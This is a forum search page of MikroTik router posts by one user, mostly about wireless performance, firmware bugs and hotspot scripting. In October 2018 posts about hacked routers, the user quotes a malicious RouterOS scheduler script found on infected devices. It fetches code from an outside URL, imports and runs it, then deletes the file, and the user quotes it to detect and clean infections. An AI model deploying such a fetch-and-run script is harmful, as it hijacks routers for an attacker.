Community discussions

Search found 44 matches

by orangetek
Tue Oct 23, 2018 9:02 am
Forum: Announcements
Topic: URGENT security reminder
Replies: 84
Views: 35557

Re: URGENT security reminder

Does anyone know what this script is downloading and what it is doing?

*EDIT*

The first script returns a 2 byte string "no"
by orangetek
Tue Oct 23, 2018 8:54 am
Forum: Announcements
Topic: URGENT security reminder
Replies: 84
Views: 35557

Re: URGENT security reminder

Ok. Thanks for the info, we are currently seeing over 150 devices running these scripts. i am making a script to mass login and delete.

For anyone facing these issues, block access to service port inbound on your main gateway first.
by orangetek
Tue Oct 23, 2018 8:49 am
Forum: Announcements
Topic: URGENT security reminder
Replies: 84
Views: 35557

Re: URGENT security reminder

Normis, is it enough to remove the scripts or is something injected and running on the routers that require a netinstall?
by orangetek
Tue Oct 23, 2018 8:27 am
Forum: Announcements
Topic: URGENT security reminder
Replies: 84
Views: 35557

Re: URGENT security reminder

Thanks normis. Another script found.
:do {/tool fetch url="http://meaghan.pythonanywhere.com/" dst-path=tmp} on-error={:put "get http error"};
/import tmp;
/file remove tmp;
i am using these urls to detect infected devices
by orangetek
Tue Oct 23, 2018 8:07 am
Forum: Announcements
Topic: URGENT security reminder
Replies: 84
Views: 35557

Re: URGENT security reminder

I have had a lot of devices hacked due to bad or no firewall configuration on those devices. The hostname is changed to "test". Upon inspection, a script is added and run via the scheduler every 2 hours. Here is the script add name=ip owner=admin policy=\ reboot,read,write,policy,test,password,sniff...
by orangetek
Thu Oct 11, 2018 8:20 am
Forum: Beginner Basics
Topic: Source NAT with multiple public IP adresses
Replies: 9
Views: 7655

Re: Source NAT with multiple public IP adresses

Sorry for dragging this thread up. I have 768 routed public ip address via a /30 point to point ip. The 768 public ip's are split into 3 /24 subnets. I have 700 customers split over many internal /24 subnets but each subnet is not using more than 30 ip's. I want to give each customer a public ip add...
by orangetek
Tue Jul 24, 2018 9:29 am
Forum: General
Topic: V6.43rc45 Switch Port Isolation
Replies: 1
Views: 848

Re: V6.43rc45 Switch Port Isolation

I had the same problem on a 960PGS. It seems that this must be a bug because you can still do it in hardware on some devices using Switch->Rule tab. On your device it is not supported at all so you are out of luck. Mikrotik needs to update which devices support these functions.
by orangetek
Fri Jul 20, 2018 2:26 pm
Forum: General
Topic: [6.43rc44] Hardware offloaded bridge and 'Switch Port Isolation' not working.
Replies: 3
Views: 952

[6.43rc44] Hardware offloaded bridge and 'Switch Port Isolation' not working.

Models Tested: RB750UP-r2 and RB960PGS (Firmware also updated) Both units were reset to defaults with no config. These are the steps i took to set up a simple bridge and port isolation: 1. Create bridge with protocol mode to none 2. add all ethernet ports to bridge making sure hw offload is enabled ...
by orangetek
Fri Feb 17, 2017 10:54 am
Forum: Wireless Networking
Topic: LEDE RC2 on hAP Lite WOW!
Replies: 11
Views: 2383

Re: LEDE RC2 on hAP Lite WOW!

no-country is the same as USA, so there are limits applied, even if you set antenna-gain=0 You should check the wireless menu, set the wireless mode to "superchannel" to work at max power. Default there is "regulatory domain". how can the router default to local regulation if nothing asks you to se...
by orangetek
Thu Feb 16, 2017 5:06 pm
Forum: Wireless Networking
Topic: LEDE RC2 on hAP Lite WOW!
Replies: 11
Views: 2383

Re: LEDE RC2 on hAP Lite WOW!

For some reason those settings were already applied. I forgot to mention that my tests were performed with 20mhz bandwidth, dual chain. I just checked and the defaults set to "no country set" antenna gain=0 and tx power "default". Also, how can the router default to local regulation if nothing asks ...
by orangetek
Thu Feb 16, 2017 1:24 pm
Forum: Wireless Networking
Topic: LEDE RC2 on hAP Lite WOW!
Replies: 11
Views: 2383

Re: LEDE RC2 on hAP Lite WOW!

I think those settings are default, i just checked and it is set like so. Both routers are on channel 11. I also made sure only 1 device was connected at a time. I repeated the speed test many times on each unit.
by orangetek
Thu Feb 16, 2017 1:16 pm
Forum: Wireless Networking
Topic: LEDE RC2 on hAP Lite WOW!
Replies: 11
Views: 2383

Re: LEDE RC2 on hAP Lite WOW!

Hi Normis, at 20 meters with the obstructions, the tx was much lower with routeros. My phone was showing the same signal strength (3 out of 5 bars) for both 20m tests
by orangetek
Thu Feb 16, 2017 1:09 pm
Forum: Wireless Networking
Topic: LEDE RC2 on hAP Lite WOW!
Replies: 11
Views: 2383

LEDE RC2 on hAP Lite WOW!

Just a heads up if you are having wifi performance issues on these cheap little babies. Flashing this unit with LEDE RC2 makes wifi perform super fast! I done a comparison with 2 units at the same location with the same wifi channels, 1 routeros 6.38.1 and 1 LEDE RC2. 1 device connected, 1 meter awa...
by orangetek
Tue Jul 12, 2016 9:16 am
Forum: General
Topic: 802.11ac spectral scan
Replies: 158
Views: 33115

Re: 802.11ac spectral scan

I got fed up waiting for mikrotik to implement this so i replaced a multihop link with 4 powerbeam AC 400's and never looked back. I'm getting over 110 mbits/sec end to end with a single tcp stream and 3ms latency @20mhz channel width v8beta14. In fact, it's so good, i'm getting ready to replace my ...
by orangetek
Sat Apr 23, 2016 6:14 pm
Forum: Announcements
Topic: v6.36rc [release candidate] is released, wireless-fp package is discontinued!
Replies: 295
Views: 65728

Re: v6.36rc [release candidate] is released, wireless-fp package is discontinued!

@w0lt and nadeu, Do you know what an RC is? It's a "Release Candidate" and its purpose is to be tested so that the developers know what doesn't work beyond the numerous configurations they have tried themselves. They cannot possibly try every config combination before they release a version and if t...
by orangetek
Sat Jan 23, 2016 9:44 am
Forum: Wireless Networking
Topic: Mikrotik AC PtP - Nstreme will NOT connect at all but NV2 will???
Replies: 53
Views: 9054

Re: Mikrotik AC PtP - Nstreme will NOT connect at all but NV2 will???

Well we are using nstreme everywhere on our network, AC and N hardware, SXT's, Netmetals, OmniTik's and DynaDishes without any problems. 6.33.3 and 6.33.5.
by orangetek
Fri Jan 22, 2016 11:03 pm
Forum: Wireless Networking
Topic: Optimizin WiFi performance under congested environment
Replies: 4
Views: 1085

Re: Optimizin WiFi performance under congested environment

Try setting "Adaptive Noise Immunity" to "ap and client mode" under advanced wireless settings. To set channel 13, set country to Japan or one that supports 13 channels. You can also set the frequency mode to superchannel and use 2472. Just bear in mind it is illegal to use channels that are outside...
by orangetek
Thu Jan 21, 2016 7:37 pm
Forum: Wireless Networking
Topic: nstreme poll timeout workaround
Replies: 0
Views: 470

nstreme poll timeout workaround

I have been working on a solution for the age old nstreme disconnect problem and have finally found something workable. The new 6.33.3 and 6.33.5 wireless-cm2 packages already solve the problem 90%, thanks mikrotik, but we still have a few cpe's that disconnect every so often. The solution is to rep...
by orangetek
Sat Oct 17, 2015 4:32 pm
Forum: General
Topic: Unrecorded packet drops and low level UDP packet loss
Replies: 1
Views: 1021

Re: Unrecorded packet drops and low level UDP packet loss

We are also seeing this across various RouterOS platforms. In one example, we have an x86 RouterOS box running 3 KVM's. 1 KVM is running a custom hotspot and the other 2 (openwrt) are each connected to a wan port. The main RouterOS is doing load balancing. If i ping google's dns severs from the hots...
by orangetek
Mon Jul 13, 2015 10:57 am
Forum: RouterBOARD hardware
Topic: CCR-1036-12G-4S ether4 random behaviour
Replies: 3
Views: 708

Re: CCR-1036-12G-4S ether4 random behaviour

I also done a netinstall and it still happens. I just noticed the port is showing R and the odd packet passing it without anything plugged in. It is not part of a bridge or network. Todays behavior allows me to plug in my PC and access the unit via MAC winbox. So it is very random it what it does.
by orangetek
Sun Jul 12, 2015 9:23 pm
Forum: RouterBOARD hardware
Topic: CCR-1036-12G-4S ether4 random behaviour
Replies: 3
Views: 708

Re: CCR-1036-12G-4S ether4 random behaviour

I have reset to factory defaults a few times over a few versions and it still happens
by orangetek
Thu Jul 02, 2015 12:57 pm
Forum: RouterBOARD hardware
Topic: CCR-1036-12G-4S ether4 random behaviour
Replies: 3
Views: 708

CCR-1036-12G-4S ether4 random behaviour

We have had an issue where ether4 seems to stay on (RS) even when the cable is unplugged. When this happens, no data passes the port until we reboot the unit. Before 6.29.1, we had the same issue with ether3 as well as ether4. Is this a hardware fault? Sometimes, disabling/enabling the port fixes th...
by orangetek
Mon Jun 22, 2015 6:47 pm
Forum: Wireless Networking
Topic: NV2 Multhop TCP single stream performance solved.
Replies: 3
Views: 1429

Re: NV2 Multhop TCP single stream performance solved.

Sorry for replying so late, I did not use WDS anywhere in this setup. Just put the AP wireless setting "bridge mode disabled" and on the client side, "Station" not station-bridge. You should only do this if you are running a fully routed setup otherwise you will loose MAC transparency. Mikrotik stat...
by orangetek
Thu May 28, 2015 11:47 am
Forum: Wireless Networking
Topic: NV2 Multhop TCP single stream performance solved.
Replies: 3
Views: 1429

NV2 Multhop TCP single stream performance solved.

This topic may help people complaining about the nv2 multihop tcp issue. When we reached 250 cpe's on our flat bridged network, we noticed significant performance degradation. Although broadcast packets were not overly high we realized that it was continuously using air time. A friend of mine recomm...
by orangetek
Sat Mar 14, 2015 6:21 pm
Forum: General
Topic: What is the best way to split - Bandwidth
Replies: 7
Views: 1481

Re: What is the best way to split - Bandwidth

Search for PCQ
by orangetek
Sat Mar 14, 2015 5:38 pm
Forum: General
Topic: LAN/WAN interfaces show more bandwidth than Queue Tree max limit
Replies: 0
Views: 354

LAN/WAN interfaces show more bandwidth than Queue Tree max limit

I have an issue where my lan/wan interfaces appear to be passing more bandwidth than max limit settings in queue tree. I have checked that I have a catch all rule for both upload and download in my mangle rules. Does anyone know what might be causing this? My setup is pretty basic. I have also seen ...
by orangetek
Mon Dec 01, 2014 10:11 pm
Forum: Wireless Networking
Topic: Nstreme "not polled for too long" possibly fixed.
Replies: 13
Views: 4317

Re: Nstreme "not polled for too long" possibly fixed.

just curious, what do you use now? I should clarify that we didn't rip out the Nstreme stuff. There is still a fair amount of that in use. Most new installations, though have been Ubiquiti Airmax M5. It ain't perfect either, though, and certainly has its own share of problems. -- Nathan I moved awa...
by orangetek
Sun Nov 30, 2014 9:46 pm
Forum: Wireless Networking
Topic: Nstreme "not polled for too long" possibly fixed.
Replies: 13
Views: 4317

Re: Nstreme "not polled for too long" possibly fixed.

I tried hardware retries at 15 on both sides but it did not completely fix the issue. With periodic calibration off and hardware retries at default, the problem has vanished. I have a CPE in a very noisy environment that was running NV2 until a few hours ago when I switch that segment to nstreme and...
by orangetek
Sat Nov 29, 2014 6:33 pm
Forum: Wireless Networking
Topic: Nstreme "not polled for too long" possibly fixed.
Replies: 13
Views: 4317

Nstreme "not polled for too long" possibly fixed.

I have been battling with the Nstreme poll timeout issue for over a year now. I have read numerous posts on this issue and tried all suggested fixes but nothing has worked 100%, not to say that this is a 100% fix but so far so good. I have over 90 SXT Lite 5's connected across 9 SXT SA's. All are us...
by orangetek
Sat Nov 29, 2014 6:17 pm
Forum: Wireless Networking
Topic: This is getting ridiculous!
Replies: 8
Views: 1896

Re: This is getting ridiculous!

Unfortunately the units are in service as I managed to downgrade them to 6.20. But I have another pair with the same problem in the workshop. When I get time, i'll send an export. Thanks
by orangetek
Tue Nov 25, 2014 10:32 am
Forum: Wireless Networking
Topic: This is getting ridiculous!
Replies: 8
Views: 1896

Re: This is getting ridiculous!

The units connect to each other fine but no data passes the bridge. The same exact settings on the SXT ac running 6.20 work fine. As soon as I upgrade it, all traffic stops.
by orangetek
Mon Nov 24, 2014 11:22 pm
Forum: Wireless Networking
Topic: This is getting ridiculous!
Replies: 8
Views: 1896

Re: This is getting ridiculous!

Normis, I just downloaded that file and the wireless-fp file does not exist inside the zip file. I managed to find it after an hour of searching the forums before I came back to read this. By the way, the problem is the SXT ac unit. The netmetal 5 has 6.22 and is now communicating with the SXT ac ru...
by orangetek
Mon Nov 24, 2014 10:49 am
Forum: Wireless Networking
Topic: This is getting ridiculous!
Replies: 8
Views: 1896

This is getting ridiculous!

I decided to upgrade an SXT ac and Netmetal 5 to 6.22 to find that the devices stopped communicating. I then proceeded to reset the configuration on both devices and the problem persisted. The only packages installed on both devices are system, dhcp and wireless-fp. So I thought, ok, ill downgrade b...
by orangetek
Wed Aug 27, 2014 4:54 pm
Forum: Wireless Networking
Topic: Metal 2 shpn Problem in WIFI
Replies: 151
Views: 82941

Re: Metal 2 shpn Problem in WIFI

@MSSFL

Do you have a link to this firmware file?
by orangetek
Fri Mar 07, 2014 3:53 pm
Forum: General
Topic: CPE--->MT Bridge--->m0n0wall VLAN/Router dst-nat problem
Replies: 1
Views: 743

CPE--->MT Bridge--->m0n0wall VLAN/Router dst-nat problem

My customers are connected through a mikrotik bridge going to a m0n0wall router setup with 2 vlans. CPE VLAN ID2--->port 1-9 MT Bridge--->m0n0wall VLAN/Router 10.0.1.2 | | port 10 192.168.254.0/24 | splash page PC 192.168.254.254:80 The MT bridge has ports 1-9 bridged and port 10 has a separate subn...
by orangetek
Tue Oct 22, 2013 2:26 pm
Forum: Scripting
Topic: Having a nightmare developing API for Purebasic
Replies: 3
Views: 963

Re: Having a nightmare developing API for Purebasic

Thank you. Understood
by orangetek
Mon Oct 21, 2013 2:42 pm
Forum: Scripting
Topic: Having a nightmare developing API for Purebasic
Replies: 3
Views: 963

Re: Having a nightmare developing API for Purebasic

I figured it out. The second "/login" ends with chr(11). Is there anywhere in the docs that tells you this stuff?
by orangetek
Mon Oct 21, 2013 1:56 pm
Forum: Scripting
Topic: Having a nightmare developing API for Purebasic
Replies: 3
Views: 963

Having a nightmare developing API for Purebasic

Hi all, i have been busy the last couple of days porting the API to purebasic. I have hit a brick wall and it is frustrating the hell out of me. The docs are not helping me much either. I am having problems authenticating my client with the server. 1. Send a chr(6) 2. Send "/login"+chr(0) I get a re...
by orangetek
Thu Aug 15, 2013 8:06 pm
Forum: Scripting
Topic: New Mikrotik user. Please help with hotspot script.
Replies: 3
Views: 2936

Re: New Mikrotik user. Please help with hotspot script.

I managed to do my first script the hard way since no one came forward. :foreach users in=[/ip hotspot active find] do={ :local date [ /system clock get date ]; :local ip [/ip hotspot active get $users address]; :local mac [/ip hotspot active get $users mac-address]; :local username [/ip hotspot act...
by orangetek
Thu Aug 15, 2013 5:00 pm
Forum: Scripting
Topic: New Mikrotik user. Please help with hotspot script.
Replies: 3
Views: 2936

Re: New Mikrotik user. Please help with hotspot script.

No reply's? No one willing to help? The learning curve is pretty steep. Can someone at least help me add the mac address as a comment to a user that logs in? The code below works fine. It disables the user once logged in and puts them in the ip binding list. I just need to add the mac address as a c...
by orangetek
Wed Aug 14, 2013 6:38 pm
Forum: Scripting
Topic: New Mikrotik user. Please help with hotspot script.
Replies: 3
Views: 2936

Re: New Mikrotik user. Please help with hotspot script.

Is there a way i can modify this to remove the ip binding as well as the user? { :local offset 7 :global today { :local date [ /system clock get date ] :local montharray ( "jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec" ) :local monthdays ( 31, 28, 31, 30, 31, 30, 31, 31, 30,...
by orangetek
Wed Aug 14, 2013 5:43 pm
Forum: Scripting
Topic: New Mikrotik user. Please help with hotspot script.
Replies: 3
Views: 2936

New Mikrotik user. Please help with hotspot script.

Hi all, I run a small WISP in Cyprus and i am taking the plunge to switch over to RouterOS. Please bear with me, i have a programming background but RouterOS script is new to me. From what i have read on the forum, User Manager is not a very reliable option. What i want to do is, when a user logs in...